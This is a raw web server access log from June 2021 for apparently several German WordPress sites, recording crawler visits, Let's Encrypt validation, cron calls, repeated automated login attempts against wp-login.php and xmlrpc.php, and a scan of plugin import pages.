209.145.63.0 - - [30/Jun/2021:01:42:19 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.145.63.0 - - [30/Jun/2021:01:42:20 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.145.63.0 - - [30/Jun/2021:01:42:21 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.145.63.0 - - [30/Jun/2021:01:42:22 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
114.119.137.0 - - [30/Jun/2021:01:43:25 +0200] "GET /pl/unsere-maerkte/drehkreuze-service-partner HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.0 - - [30/Jun/2021:01:43:28 +0200] "GET /pl/unsere-maerkte/drehkreuze-service-partner/ HTTP/1.1" 200 10769 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
203.6.149.0 - - [30/Jun/2021:01:43:31 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
203.6.149.0 - - [30/Jun/2021:01:43:32 +0200] "POST /wp-login.php HTTP/1.1" 200 2884 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
203.6.149.0 - - [30/Jun/2021:01:43:34 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
54.36.148.0 - - [30/Jun/2021:01:47:34 +0200] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
81.169.178.0 - - [30/Jun/2021:01:48:40 +0200] "POST /wp-cron.php?doing_wp_cron=1625010520.2393848896026611328125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625010520.2393848896026611328125" "WordPress/5.2.11; https://www.computerdoc24.de"
208.113.155.0 - - [30/Jun/2021:01:48:40 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
208.113.155.0 - - [30/Jun/2021:01:48:41 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
208.113.155.0 - - [30/Jun/2021:01:48:41 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.249.75.0 - - [30/Jun/2021:01:49:50 +0200] "GET /pl/unsere-produkte-und-services/kranbare-auflieger/ HTTP/1.1" 301 336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.0 - - [30/Jun/2021:01:49:50 +0200] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.0 - - [30/Jun/2021:01:49:51 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.169.178.0 - - [30/Jun/2021:01:52:08 +0200] "POST /wp-cron.php?doing_wp_cron=1625010728.4153831005096435546875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1625010728.4153831005096435546875" "WordPress/5.6.4; https://www.ipcbusiness.de"
178.128.51.0 - - [30/Jun/2021:01:52:08 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
178.128.51.0 - - [30/Jun/2021:01:52:10 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
178.128.51.0 - - [30/Jun/2021:01:52:12 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
81.169.178.0 - - [30/Jun/2021:01:59:44 +0200] "POST /wp-cron.php?doing_wp_cron=1625011184.3830149173736572265625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625011184.3830149173736572265625" "WordPress/5.2.11; https://www.computerdoc24.de"
114.119.140.0 - - [30/Jun/2021:01:59:44 +0200] "GET /product/schneller-arbeits-und-internet-pc-3 HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.140.0 - - [30/Jun/2021:01:59:45 +0200] "GET /product/schneller-arbeits-und-internet-pc-3/ HTTP/1.1" 200 13858 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:02:00:09 +0200] "POST /wp-cron.php?doing_wp_cron=1625011208.9962770938873291015625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625011208.9962770938873291015625" "WordPress/5.2.11; https://www.computerdoc24.de"
167.71.251.0 - - [30/Jun/2021:02:00:08 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.71.251.0 - - [30/Jun/2021:02:00:09 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.71.251.0 - - [30/Jun/2021:02:00:10 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.238.118.0 - - [30/Jun/2021:02:01:58 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.238.118.0 - - [30/Jun/2021:02:01:59 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.238.118.0 - - [30/Jun/2021:02:02:00 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.238.118.0 - - [30/Jun/2021:02:02:01 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.238.118.0 - - [30/Jun/2021:02:02:02 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
114.119.149.0 - - [30/Jun/2021:02:03:01 +0200] "GET /unsere-maerkte HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.149.0 - - [30/Jun/2021:02:03:03 +0200] "GET /unsere-maerkte/ HTTP/1.1" 200 10730 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:02:08:53 +0200] "POST /wp-cron.php?doing_wp_cron=1625011733.4435698986053466796875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625011733.4435698986053466796875" "WordPress/5.2.11; https://www.computerdoc24.de"
114.119.132.0 - - [30/Jun/2021:02:08:52 +0200] "GET /product/arbeits-und-internet-pc-intel-prozessor-8gb-ram-500gb-festplatte-1-jahr-garantie HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:02:09:39 +0200] "POST /wp-cron.php?doing_wp_cron=1625011778.7376189231872558593750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625011778.7376189231872558593750" "WordPress/5.2.11; https://www.computerdoc24.de"
64.90.48.0 - - [30/Jun/2021:02:09:38 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
64.90.48.0 - - [30/Jun/2021:02:09:39 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
64.90.48.0 - - [30/Jun/2021:02:09:40 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
54.36.148.0 - - [30/Jun/2021:02:11:10 +0200] "GET /ru/auftraggeber/ HTTP/1.1" 200 10856 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
81.169.178.0 - - [30/Jun/2021:02:12:54 +0200] "POST /wp-cron.php?doing_wp_cron=1625011974.3029770851135253906250 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625011974.3029770851135253906250" "WordPress/5.2.11; https://www.computerdoc24.de"
114.119.157.0 - - [30/Jun/2021:02:12:54 +0200] "GET /product/iiyama-monitor-g-master-g2530hsu-b1-622cm-245 HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.157.0 - - [30/Jun/2021:02:12:55 +0200] "GET /product/iiyama-monitor-g-master-g2530hsu-b1-622cm-245/ HTTP/1.1" 200 13696 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
64.90.40.0 - - [30/Jun/2021:02:13:28 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
64.90.40.0 - - [30/Jun/2021:02:13:29 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
64.90.40.0 - - [30/Jun/2021:02:13:30 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
54.203.73.0 - - [30/Jun/2021:02:13:38 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0"
54.203.73.0 - - [30/Jun/2021:02:13:39 +0200] "GET /favicon.ico HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0"
54.203.73.0 - - [30/Jun/2021:02:13:39 +0200] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0"
81.88.52.0 - - [30/Jun/2021:02:15:51 +0200] "POST /wp-login.php HTTP/1.1" 200 2884 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
167.86.70.0 - - [30/Jun/2021:02:16:23 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
34.77.162.0 - - [30/Jun/2021:02:19:01 +0200] "GET / HTTP/1.1" 200 2691 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.69.0 - - [30/Jun/2021:02:19:59 +0200] "GET /robots.txt HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.0 - - [30/Jun/2021:02:19:59 +0200] "GET /product/asus-x53b-mit-neuer-240gb-ssd/ HTTP/1.1" 301 325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
18.197.97.0 - - [30/Jun/2021:02:21:34 +0200] "GET /.well-known/acme-challenge/UonAB_oZeV9TI4ytsO6MWxR1cj88QvC6UnieEHDRGfM HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.197.97.0 - - [30/Jun/2021:02:21:35 +0200] "GET /.well-known/acme-challenge/BbXyCWTMlzo0JcVD2cxxiaI49BLxvW7-yKMKIOmC6F4 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
52.39.4.0 - - [30/Jun/2021:02:21:35 +0200] "GET /.well-known/acme-challenge/BbXyCWTMlzo0JcVD2cxxiaI49BLxvW7-yKMKIOmC6F4 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.19.56.0 - - [30/Jun/2021:02:21:35 +0200] "GET /.well-known/acme-challenge/UonAB_oZeV9TI4ytsO6MWxR1cj88QvC6UnieEHDRGfM HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:21:36 +0200] "GET /.well-known/acme-challenge/UonAB_oZeV9TI4ytsO6MWxR1cj88QvC6UnieEHDRGfM HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.19.56.0 - - [30/Jun/2021:02:21:36 +0200] "GET /.well-known/acme-challenge/BbXyCWTMlzo0JcVD2cxxiaI49BLxvW7-yKMKIOmC6F4 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:21:37 +0200] "GET /.well-known/acme-challenge/BbXyCWTMlzo0JcVD2cxxiaI49BLxvW7-yKMKIOmC6F4 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.197.97.0 - - [30/Jun/2021:02:21:48 +0200] "GET /.well-known/acme-challenge/oLrgwDkdvYQvR5_ZfYOG3rhmAVSr7e0bXK22GvnUvRo HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.133.109.0 - - [30/Jun/2021:02:21:48 +0200] "GET /.well-known/acme-challenge/oLrgwDkdvYQvR5_ZfYOG3rhmAVSr7e0bXK22GvnUvRo HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.19.56.0 - - [30/Jun/2021:02:21:48 +0200] "GET /.well-known/acme-challenge/vAJxjMgYOOzAOl2WbD0eNKvg3AUPMw-zSpvhMRPBBHw HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.197.97.0 - - [30/Jun/2021:02:21:48 +0200] "GET /.well-known/acme-challenge/vAJxjMgYOOzAOl2WbD0eNKvg3AUPMw-zSpvhMRPBBHw HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
52.39.4.0 - - [30/Jun/2021:02:21:49 +0200] "GET /.well-known/acme-challenge/vAJxjMgYOOzAOl2WbD0eNKvg3AUPMw-zSpvhMRPBBHw HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.133.109.0 - - [30/Jun/2021:02:21:51 +0200] "GET /.well-known/acme-challenge/vAJxjMgYOOzAOl2WbD0eNKvg3AUPMw-zSpvhMRPBBHw HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.184.29.0 - - [30/Jun/2021:02:22:02 +0200] "GET /.well-known/acme-challenge/jbnUaUO29scrwVGnUTgPj4g-xMIr3i3OwxAg6yB2xEY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.184.29.0 - - [30/Jun/2021:02:22:02 +0200] "GET /.well-known/acme-challenge/-B-8wNtdmjm2hGs9DztVldybZO-ohJAYPIDR01zwfHo HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.221.186.0 - - [30/Jun/2021:02:22:02 +0200] "GET /.well-known/acme-challenge/jbnUaUO29scrwVGnUTgPj4g-xMIr3i3OwxAg6yB2xEY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.116.86.0 - - [30/Jun/2021:02:22:03 +0200] "GET /.well-known/acme-challenge/jbnUaUO29scrwVGnUTgPj4g-xMIr3i3OwxAg6yB2xEY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.116.86.0 - - [30/Jun/2021:02:22:03 +0200] "GET /.well-known/acme-challenge/-B-8wNtdmjm2hGs9DztVldybZO-ohJAYPIDR01zwfHo HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:22:03 +0200] "GET /.well-known/acme-challenge/-B-8wNtdmjm2hGs9DztVldybZO-ohJAYPIDR01zwfHo HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:22:03 +0200] "GET /.well-known/acme-challenge/jbnUaUO29scrwVGnUTgPj4g-xMIr3i3OwxAg6yB2xEY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.184.29.0 - - [30/Jun/2021:02:22:16 +0200] "GET /.well-known/acme-challenge/TpYj5pYQskOoAwfiieC1J_QRCjpRQym6PbuNFwWklVQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.120.130.0 - - [30/Jun/2021:02:22:16 +0200] "GET /.well-known/acme-challenge/kLmGSNGF6iv9amYv7UYsLIL7IrnRadQBWwbNe5_YJDU HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.221.255.0 - - [30/Jun/2021:02:22:16 +0200] "GET /.well-known/acme-challenge/kLmGSNGF6iv9amYv7UYsLIL7IrnRadQBWwbNe5_YJDU HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.142.122.0 - - [30/Jun/2021:02:22:16 +0200] "GET /.well-known/acme-challenge/kLmGSNGF6iv9amYv7UYsLIL7IrnRadQBWwbNe5_YJDU HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.221.186.0 - - [30/Jun/2021:02:22:17 +0200] "GET /.well-known/acme-challenge/TpYj5pYQskOoAwfiieC1J_QRCjpRQym6PbuNFwWklVQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.133.109.0 - - [30/Jun/2021:02:22:17 +0200] "GET /.well-known/acme-challenge/kLmGSNGF6iv9amYv7UYsLIL7IrnRadQBWwbNe5_YJDU HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.116.86.0 - - [30/Jun/2021:02:22:18 +0200] "GET /.well-known/acme-challenge/TpYj5pYQskOoAwfiieC1J_QRCjpRQym6PbuNFwWklVQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.133.109.0 - - [30/Jun/2021:02:22:19 +0200] "GET /.well-known/acme-challenge/TpYj5pYQskOoAwfiieC1J_QRCjpRQym6PbuNFwWklVQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
139.59.33.0 - - [30/Jun/2021:02:25:02 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
139.59.33.0 - - [30/Jun/2021:02:25:04 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
139.59.33.0 - - [30/Jun/2021:02:25:05 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
139.59.33.0 - - [30/Jun/2021:02:25:06 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
139.59.33.0 - - [30/Jun/2021:02:25:08 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
3.142.122.0 - - [30/Jun/2021:02:25:23 +0200] "GET /.well-known/acme-challenge/jc4PF-OFYaRlUIGXhK2qpMqXVhXkoyOji5YldGwTKDQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:25:23 +0200] "GET /.well-known/acme-challenge/jc4PF-OFYaRlUIGXhK2qpMqXVhXkoyOji5YldGwTKDQ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
64.78.149.0 - - [30/Jun/2021:02:25:23 +0200] "GET /.well-known/acme-challenge/8XKz_Wqdr3_x-tEzv4mOX71bmo9u8_UqE2YfGBq1az4 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
81.169.178.0 - - [30/Jun/2021:02:31:18 +0200] "POST /wp-cron.php?doing_wp_cron=1625013078.5405230522155761718750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625013078.5405230522155761718750" "WordPress/5.2.11; https://www.computerdoc24.de"
173.212.219.0 - - [30/Jun/2021:02:31:18 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
173.212.219.0 - - [30/Jun/2021:02:31:19 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
173.212.219.0 - - [30/Jun/2021:02:31:19 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
143.198.112.0 - - [30/Jun/2021:02:34:19 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
143.198.112.0 - - [30/Jun/2021:02:34:26 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
143.198.112.0 - - [30/Jun/2021:02:34:27 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
81.169.178.0 - - [30/Jun/2021:02:35:04 +0200] "POST /wp-cron.php?doing_wp_cron=1625013304.1616680622100830078125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625013304.1616680622100830078125" "WordPress/5.2.11; https://www.computerdoc24.de"
93.125.1.0 - - [30/Jun/2021:02:35:04 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
93.125.1.0 - - [30/Jun/2021:02:35:04 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
93.125.1.0 - - [30/Jun/2021:02:35:05 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
20.83.155.0 - - [30/Jun/2021:02:35:52 +0200] "GET //wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1" 200 - "-" "python-requests/2.25.1"
20.83.155.0 - - [30/Jun/2021:02:35:52 +0200] "GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1" 200 12216 "-" "python-requests/2.25.1"
20.83.155.0 - - [30/Jun/2021:02:35:57 +0200] "GET //wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php HTTP/1.1" 200 - "-" "python-requests/2.25.1"
20.83.155.0 - - [30/Jun/2021:02:35:59 +0200] "GET /wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php HTTP/1.1" 200 12217 "-" "python-requests/2.25.1"
20.83.155.0 - - [30/Jun/2021:02:36:02 +0200] "GET //wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php HTTP/1.1" 200 - "-" "python-requests/2.25.1"
20.83.155.0 - - [30/Jun/2021:02:36:03 +0200] "GET /wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php HTTP/1.1" 200 12218 "-" "python-requests/2.25.1"
114.119.139.0 - - [30/Jun/2021:02:36:06 +0200] "GET /en/impressum/ HTTP/1.1" 200 13276 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.132.4.0 - - [30/Jun/2021:02:38:05 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
81.169.178.0 - - [30/Jun/2021:02:38:39 +0200] "POST /wp-cron.php?doing_wp_cron=1625013519.1909639835357666015625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625013519.1909639835357666015625" "WordPress/5.2.11; https://www.computerdoc24.de"
81.88.52.0 - - [30/Jun/2021:02:38:39 +0200] "POST /wp-login.php HTTP/1.1" 503 7057 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
